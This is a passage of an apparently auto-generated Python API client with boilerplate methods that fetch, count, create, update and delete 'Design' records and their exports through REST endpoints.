form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignMember',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_dynamic_data_get(self, id, **kwargs):
"""
Fetches belongsTo relation dynamicData.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_dynamic_data_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: DynamicData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_dynamic_data_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_dynamic_data_get_with_http_info(id, **kwargs)
return data
def designs_id_dynamic_data_get_with_http_info(self, id, **kwargs):
"""
Fetches belongsTo relation dynamicData.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_dynamic_data_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: DynamicData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_dynamic_data_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_dynamic_data_get`")
collection_formats = {}
resource_path = '/Designs/{id}/dynamicData'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DynamicData',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_exists_get(self, id, **kwargs):
"""
Check whether a model instance exists in the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_exists_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_exists_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_exists_get_with_http_info(id, **kwargs)
return data
def designs_id_exists_get_with_http_info(self, id, **kwargs):
"""
Check whether a model instance exists in the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_exists_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_exists_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_exists_get`")
collection_formats = {}
resource_path = '/Designs/{id}/exists'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2002',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_exports_count_get(self, id, **kwargs):
"""
Counts exports of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_exports_count_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_exports_count_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_exports_count_get_with_http_info(id, **kwargs)
return data
def designs_id_exports_count_get_with_http_info(self, id, **kwargs):
"""
Counts exports of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_exports_count_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'where']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_exports_count_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_exports_count_get`")
collection_formats = {}
resource_path = '/Designs/{id}/exports/count'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'where' in params:
query_params['where'] = params['where']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_exports_delete(self, id, **kwargs):
"""
Deletes all exports of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_exports_delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_exports_delete_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_exports_delete_with_http_info(id, **kwargs)
return data
def designs_id_exports_delete_with_http_info(self, id, **kwargs):
"""
Deletes all exports of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_exports_delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_exports_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_exports_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/exports'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_exports_fk_delete(self, id, fk, **kwargs):
"""
Delete a related item by id for exports.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_exports_fk_delete(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for exports (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_exports_fk_delete_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_exports_fk_delete_with_http_info(id, fk, **kwargs)
return data
def designs_id_exports_fk_delete_with_http_info(self, id, fk, **kwargs):
"""
Delete a related item by id for exports.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_exports_fk_delete_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for exports (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_exports_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_exports_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_exports_fk_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/exports/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_exports_fk_get(self, id, fk, **kwargs):
"""
Find a related item by id for exports.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_exports_fk_get(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for exports (required)
:return: DesignExport
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_exports_fk_get_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_exports_fk_get_with_http_info(id, fk, **kwargs)
return data
def designs_id_exports_fk_get_with_http_info(self, id, fk, **kwargs):
"""
Find a related item by id for exports.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_exports_fk_get_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for exports (required)
:return: DesignExport
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_exports_fk_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_exports_fk_get`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_exports_fk_get`")
collection_formats = {}
resource_path = '/Designs/{id}/exports/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignExport',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_exports_fk_put(self, id, fk, **kwargs):
"""
Update a related item by id for exports.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_exports_fk_put(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for exports (required)
:param DesignExport data:
:return: DesignExport
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_exports_fk_put_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_exports_fk_put_with_http_info(id, fk, **kwargs)
return data
def designs_id_exports_fk_put_with_http_info(self, id, fk, **kwargs):
"""
Update a related item by id for exports.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_exports_fk_put_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for exports (required)
:param DesignExport data:
:return: DesignExport
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_exports_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_exports_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_exports_fk_put`")
collection_formats = {}
resource_path = '/Designs/{id}/exports/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignExport',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_exports_get(self, id, **kwargs):
"""
Queries exports of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_exports_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str filter:
:return: list[DesignExport]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_exports_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_exports_get_with_http_info(id, **kwargs)
return data
def designs_id_exports_get_with_http_info(self, id, **kwargs):
"""
Queries exports of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_exports_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str filter:
:return: list[DesignExport]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_exports_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_exports_get`")
collection_formats = {}
resource_path = '/Designs/{id}/exports'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DesignExport]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_exports_post(self, id, **kwargs):
"""
Creates a new instance in exports of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_exports_post(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param DesignExport data:
:return: DesignExport
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_exports_post_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_exports_post_with_http_info(id, **kwargs)
return data
def designs_id_exports_post_with_http_info(self, id, **kwargs):
"""
Creates a new instance in exports of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_exports_post_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param DesignExport data:
:return: DesignExport
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_exports_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_exports_post`")
collection_formats = {}
resource_path = '/Designs/{id}/exports'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignExport',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_folder_get(self, id, **kwargs):
"""
Fetches belongsTo relation folder.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_folder_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: DesignFolder
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_folder_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_folder_get_with_http_info(id, **kwargs)
return data
def designs_id_folder_get_with_http_info(self, id, **kwargs):
"""
Fetches belongsTo relation folder.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_folder_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: DesignFolder
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_folder_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_folder_get`")
collection_formats = {}
resource_path = '/Designs/{id}/folder'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignFolder',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_get(self, id, **kwargs):
"""
Find a model instance by {{id}} from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param str filter: Filter defining fields and include - must be a JSON-encoded string ({\"something\":\"value\"})
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_get_with_http_info(id, **kwargs)
return data
def designs_id_get_with_http_info(self, id, **kwargs):
"""
Find a model instance by {{id}} from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param str filter: Filter defining fields and include - must be a JSON-encoded string ({\"something\":\"value\"})
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_get`")
collection_formats = {}
resource_path = '/Designs/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Design',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_head(self, id, **kwargs):
"""
Check whether a model instance exists in the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_head(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_head_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_head_with_http_info(id, **kwargs)
return data
def designs_id_head_with_http_info(self, id, **kwargs):
"""
Check whether a model instance exists in the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_head_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_head" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
